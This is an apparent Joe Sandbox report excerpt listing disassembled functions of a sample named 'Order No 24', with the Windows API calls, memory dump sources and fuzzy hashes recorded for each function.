                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 009FDD7A
                                                                                                                                  • GetWindowDC.USER32(?), ref: 009FDD86
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 009FDD95
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009FDDA7
                                                                                                                                  • GetSysColor.USER32(00000005), ref: 009FDDC5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3430376129-0
                                                                                                                                  • Opcode ID: f2ddd8401014f9bb7a438f10aa416839f8f870af19da45cfc9de794866896461
                                                                                                                                  • Instruction ID: 2c2466538b542e0596855a2d5b7fceb536767fd734441f5f3a3fde28fcc3efca
                                                                                                                                  • Opcode Fuzzy Hash: f2ddd8401014f9bb7a438f10aa416839f8f870af19da45cfc9de794866896461
                                                                                                                                  • Instruction Fuzzy Hash: 36115E36500209EFDB21AFE4EC08BA97F66EB45325F108625FA66950F1CB320953EF20
                                                                                                                                  Function 009BCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnumChildWindows.USER32(?,009BCF50), ref: 009BCE90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                  • Opcode ID: bb6ca219f625239f6f41f62233d7d7778d1b59f83e715aaa302746889ab5d5ab
                                                                                                                                  • Instruction ID: bf637e60bd0c830d183a0fd2e3278a69c70038737516b698ec7f925dca9453f8
                                                                                                                                  • Opcode Fuzzy Hash: bb6ca219f625239f6f41f62233d7d7778d1b59f83e715aaa302746889ab5d5ab
                                                                                                                                  • Instruction Fuzzy Hash: 6E9174B0A00506EBCB18EF64C582BEAFB75BF44310F548519E499A7291DF30AD59DBE0
                                                                                                                                  Function 00983093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009830DC
                                                                                                                                  • CoUninitialize.OLE32(?,00000000), ref: 00983181
                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 009832A9
                                                                                                                                  • DestroyWindow.USER32(?), ref: 009F5079
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 009F50F8
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009F5125
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                  • String ID: close all
                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                  • Opcode ID: 7ad2613f55d4e9aa55b1c4ca57fb1fab458baef94dd73b6111208cd909244e31
                                                                                                                                  • Instruction ID: ba1f0743309508367cb845bf3d85f6d8306cf685ba620a3b682c047b389f62a0
                                                                                                                                  • Opcode Fuzzy Hash: 7ad2613f55d4e9aa55b1c4ca57fb1fab458baef94dd73b6111208cd909244e31
                                                                                                                                  • Instruction Fuzzy Hash: 459128706002068FC715FF64C895B68F3A8BF45B04F5582A9E50AA7262DF30AE66CF50
                                                                                                                                  Function 0099CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 0099CC15
                                                                                                                                    • Part of subcall function 0099CCCD: GetClientRect.USER32(?,?), ref: 0099CCF6
                                                                                                                                    • Part of subcall function 0099CCCD: GetWindowRect.USER32(?,?), ref: 0099CD37
                                                                                                                                    • Part of subcall function 0099CCCD: ScreenToClient.USER32(?,?), ref: 0099CD5F
                                                                                                                                  • GetDC.USER32 ref: 009FD137
                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009FD14A
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009FD158
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009FD16D
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009FD175
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009FD200
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                  • Opcode ID: fc7445ab49010d429d9c4574c8ae1a7aa85888f329fa27e8b7a55065cc91395f
                                                                                                                                  • Instruction ID: 391d3b282430c7c6b06b9d1e180bedce5b3973970f722678528c14f28f12b17a
                                                                                                                                  • Opcode Fuzzy Hash: fc7445ab49010d429d9c4574c8ae1a7aa85888f329fa27e8b7a55065cc91395f
                                                                                                                                  • Instruction Fuzzy Hash: 2A710274501208DFCF25DFA8CC81ABA7BBAFF88310F184669EE55562A6D7318882DF50
                                                                                                                                  Function 009EECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                    • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
                                                                                                                                    • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                                                                                                                    • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                                                                                                                    • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 009EED3C
                                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 009EED42
                                                                                                                                  • ReleaseCapture.USER32 ref: 009EED48
                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 009EEDF0
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009EEE03
                                                                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 009EEEDC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                  • API String ID: 1924731296-2107944366
                                                                                                                                  • Opcode ID: 93420c2702c82c35f1a5c15b8fb4cf0a418b92bca38267d9701a0de5db0e4acc
                                                                                                                                  • Instruction ID: 27a822b81a02542aac2ffff546cf28f8d2d324f3e4bad50e0de5851aff05bc96
                                                                                                                                  • Opcode Fuzzy Hash: 93420c2702c82c35f1a5c15b8fb4cf0a418b92bca38267d9701a0de5db0e4acc
                                                                                                                                  • Instruction Fuzzy Hash: F651A978204304AFD710EF64CC86F6AB7E8FB88304F00491DF585962E2DB71E945CB52
                                                                                                                                  Function 009D45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D45FF
                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009D462B
                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009D466D
                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009D4682
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D468F
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009D46BF
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009D4706
                                                                                                                                    • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                                  • Opcode ID: f641c163ab85018aeaec03c2146b4c6debfb0444e217966b4780881d525ae724
                                                                                                                                  • Instruction ID: e2891cc45df490610b0647c91deaaf8bc300164b8c2479e5b0071297785a4aa5
                                                                                                                                  • Opcode Fuzzy Hash: f641c163ab85018aeaec03c2146b4c6debfb0444e217966b4780881d525ae724
                                                                                                                                  • Instruction Fuzzy Hash: CB416FB2541209BFEB119F90CC89FBB77ACFF09354F008126FA069A281D7B4D9458BA4
                                                                                                                                  Function 009DB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A1DC00), ref: 009DB715
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A1DC00), ref: 009DB749
                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009DB8C1
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 009DB8EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 560350794-0
                                                                                                                                  • Opcode ID: 04e6242384b4af63a5f5ccc16cf802fc7198b695c9d1a0df5cf27eb41d960ea8
                                                                                                                                  • Instruction ID: 8809625c8f6f6b4a5e093478b9ae84f24956dd6b389b60c9db60ae3c75818566
                                                                                                                                  • Opcode Fuzzy Hash: 04e6242384b4af63a5f5ccc16cf802fc7198b695c9d1a0df5cf27eb41d960ea8
                                                                                                                                  • Instruction Fuzzy Hash: E1F13C75A00209EFCF04DF94C894EAEB7B9FF89315F118499F905AB250DB31AE46CB90
                                                                                                                                  Function 009E24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009E24F5
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E2688
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E26AC
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E26EC
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E270E
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E286F
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009E28A1
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009E28D0
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009E2947
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                  • Opcode ID: a83d3873d88edf751779a0f13255feacdc22a21a2754c27e7b28fbe7821338f7
                                                                                                                                  • Instruction ID: ac3756fe49dded4a4752c0b0236010fca51c6f6556a1f46eec7fa6de55a5097a
                                                                                                                                  • Opcode Fuzzy Hash: a83d3873d88edf751779a0f13255feacdc22a21a2754c27e7b28fbe7821338f7
                                                                                                                                  • Instruction Fuzzy Hash: F3D1AE31604241DFCB15EF25C891B6ABBE9BF84310F18895DF8999B3A2DB31EC41CB52
                                                                                                                                  Function 009EB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009EB3F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  • Opcode ID: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
                                                                                                                                  • Instruction ID: b9b9cc20fd86077c64c1ef6099c25b76cf75b42953c50c91d5d7c4bf33946e48
                                                                                                                                  • Opcode Fuzzy Hash: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
                                                                                                                                  • Instruction Fuzzy Hash: 3B51D631601288BFEF229F6ACC86BAF7B68EB45314F244411F614D61E2DB75ED50CB50
                                                                                                                                  Function 0099A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009FDB1B
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009FDB3C
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009FDB51
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009FDB6E
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009FDB95
                                                                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0099A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 009FDBA0
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009FDBBD
                                                                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0099A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 009FDBC8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1268354404-0
                                                                                                                                  • Opcode ID: 836e6a7e277a9688bdd042eee9c6da47b83e04e519f4b4418100ccc2a060a832
                                                                                                                                  • Instruction ID: d35cf01531ce676905148b5a901e125a71ad0edf54a25ab891188836747e0c8f
                                                                                                                                  • Opcode Fuzzy Hash: 836e6a7e277a9688bdd042eee9c6da47b83e04e519f4b4418100ccc2a060a832
                                                                                                                                  • Instruction Fuzzy Hash: 1A519A34A01208EFDF20DFA8CC82FAA77B9EB58750F110518FA4697290D7B4ED81DB90
                                                                                                                                  Function 009C7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                                                                                                                    • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
                                                                                                                                    • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009C75CA
                                                                                                                                  • _wcscmp.LIBCMT ref: 009C75E2
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009C75FB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 793581249-0
                                                                                                                                  • Opcode ID: c9c6d347bd55cf7b6b4604b24cb301381c834178ebc725fad69441335db8e8df
                                                                                                                                  • Instruction ID: 8b6bed637d1e7210133c23daf76770ffd0ec4d68220cd54abaa65ed3801d0296
                                                                                                                                  • Opcode Fuzzy Hash: c9c6d347bd55cf7b6b4604b24cb301381c834178ebc725fad69441335db8e8df
                                                                                                                                  • Instruction Fuzzy Hash: 805110B2E092195ADF50EB94D841EDEB3BCAF49320F0044AEF605E3141EA7496C5CFA5
                                                                                                                                  Function 0099EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EAEB
                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EB32
                                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDC86
                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDCF2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ShowWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                  • Opcode ID: 5f0a25f3a5d30ee429900134f8f2011cf730eb20cfea6623b687173854c2020c
                                                                                                                                  • Instruction ID: dfb83b6c3a51122c9e8053d56c24c70ac865d7a39c139a77924bbc41cfa810af
                                                                                                                                  • Opcode Fuzzy Hash: 5f0a25f3a5d30ee429900134f8f2011cf730eb20cfea6623b687173854c2020c
                                                                                                                                  • Instruction Fuzzy Hash: 02411871216284DBDF39CB6E8D8DB3A7A9EBB96305F19080DF28782561D675BC81C321
                                                                                                                                  Function 009BB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB26C
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB273
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB288
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB290
                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB293
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB2A3
                                                                                                                                  • GetCurrentProcess.KERNEL32(009BAEF1,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AB
                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AE
